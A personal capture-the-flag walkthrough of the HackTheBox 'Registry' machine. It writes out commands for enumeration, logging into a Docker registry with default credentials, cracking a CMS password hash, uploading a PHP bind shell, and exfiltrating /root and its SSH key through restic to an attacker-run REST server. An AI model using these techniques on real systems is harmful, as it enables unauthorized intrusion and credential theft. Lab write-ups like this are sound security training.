This is a write-up on how I solved Registry from HackTheBox.

Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.

About this box:

Actually, Registry was my first Hard level box.

Recon:

nmap Network exploration tool and security / port scanner
-sV (Version detection)
-sC Performs a script scan using the default set of scripts.
-oA for output

Only three ports are opened 22, 80 and 443. With the Nmap scan, We also got virtual host from SSL-cert subject— docker.registry.htb

Let's start with port 80, we have default Nginx welcome page

The same thing on Port 443, default Ngnix page

Okay, let’s see what we got on docker.registry.htb

We can access it via adding it to/etc/hosts file, open it with your favorite text editor and add the virtual host.

sudo vim /etc/hosts

We have a blank page onDocker.registry.htb

Spoiler alert

A registry is a storage and content delivery system, holding named Docker images, available in different tagged versions.

Enumeration

We can use Gobuster for directory enumeration.

$ gobuster dir -u http://10.10.10.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o ip-enum -t 20
$ gobuster dir -u http://docker.registry.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o vhost-enum -t 20

So far, so good we have a bolt directory on 10.10.10.159 and v2 directory on docker.registry.htb — let’s check them.

Browse tohttp://10.10.10.159/bolt which contains the official website information of bolt (CMS website)

We have here default page of bolt cms, we can run Gobuster for directory enumeration in the background and move on to the docker.registry.htb

Oh, authorization is required ondocker.registry.htb

docker.registry.htb/v2

If we try weak credentials such as admin:admin — It works perfectly

admin:admin

Okay, we are in.

A registry is a storage and content delivery system, holding named Docker images. — https://docs.docker.com/registry/introduction/

Visit docker.registry.htb/v2/_catalog to view the mirror information under this repository.

Found that the warehouse has a mirror called bolt-image. There should be a breach in the image.
The next step is to pull the image.

We need to install docker and make some change in configuration (Because of no SSL certificate)

Docker installation
$ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
$ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list$ sudo apt-get update$ sudo apt-get install docker-ce

We have docker, the next step is to make docker accept an insecure connection.

{ 
“insecure-registries”:[“docker.registry.htb:443”]
}
sudo docker login docker.registry.htb:443

Login succeeded.

The next step is to pull the latest docker image.

sudo docker pull docker.registry.htb:443/bolt-image:latest

Now run the docker image to access the content inside of the container.

sudo docker run -it docker.registry.htb:443/bolt-image:latest

Get the user

After some digging, we have the passphrase in /etc/profile.d/01-ssh.sh

GkOcz221Ftb3ugog

Let’s login with SSH

$ chmod 600 id_rsa$ ssh -i id_rsa bolt@10.10.10.159

And we can submit user hash for 20 points.

Get www-data user

In that directory, we also have script backup.php script which is owned by the root user. This script seems to be interesting but we don’t have permission to change or execute it.

Every CMS has database files.

After some searching, we can find the database file

/var/www/html/bolt/app/database

Download it with scp and check what we have

$ scp -i id_rsa bolt@10.10.10.159:/var/www/html/bolt/app/database/bolt.db ./

We can use sqlite3 to get information from the database file

Grab password and crack it with John

$ john --wordlist=/usr/share/wordlists/rockyou.txt bolt_db_hash

And we have the password admin:strawberry

Remember our scan which we left in the background?

It found/bolt/bolt directory which is a login page for bolt cms.

We can log in with the credentials admin:strawberry

Get www-data shell

We can’t get a reverse shell, because it is blocked with some kind of firewall. Let’s do it with bind shell.

From the research, we know that we can add .PHP extension to the configuration file and bypass the PHP upload restriction.

Add the PHP extension in config.yml and upload the shell again

It worked, we have our PHP bind shell on it.

Open the URL to trigger the shell and connect it with NC.

rlwrap — is a very handy tool, it let us use arrow keys

https://linux.die.net/man/1/rlwrap

Okay, We have www-data shell and we can run/usr/bin/restic backup -r test* -command with root privilege.

BUT what we can with it?

Restic is software that does backups ¯\_(ツ)_/¯

After understanding some basic operations, the restic is not difficult. First, we need to install the restic and REST server locally.

sudo apt install restic

Then, set up a backup repository.

restic init --repo /tmp/registry_bak

Install rest-server and run it

Before you try to install it make sure that your box has go language version > 1.7
https://github.com/restic/rest-server.gi

rest-server --path /tmp/registry_bak --no-auth --listen 0.0.0.0:8002

Then we need to run the backup command with the www-data user.

Because the target server appears to have some kind of firewall, it is not possible to connect to the external server. So in order to back up the data locally, we need SSH Remote port forwarding.

ssh -i id_rsa -R 8002:127.0.0.1:8002 bolt@10.10.10.159

Create a file that contains the password, and backup the /root directory.

From the root directory, we can grab root.txt and ssh private key

$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8002/ /root/ -p pass

Backup is done!

Now Restore backup and read root.txt

$ restic -r /tmp/registry_bak/ restore latest --target ./registry_restored

Or grab the id_rsa and ssh with the root user.

I hope you enjoyed, follow me for future posts.

Twitterhttps://twitter.com/ls4cfk

https://www.hackthebox.eu/profile/94787

Born at a very young age.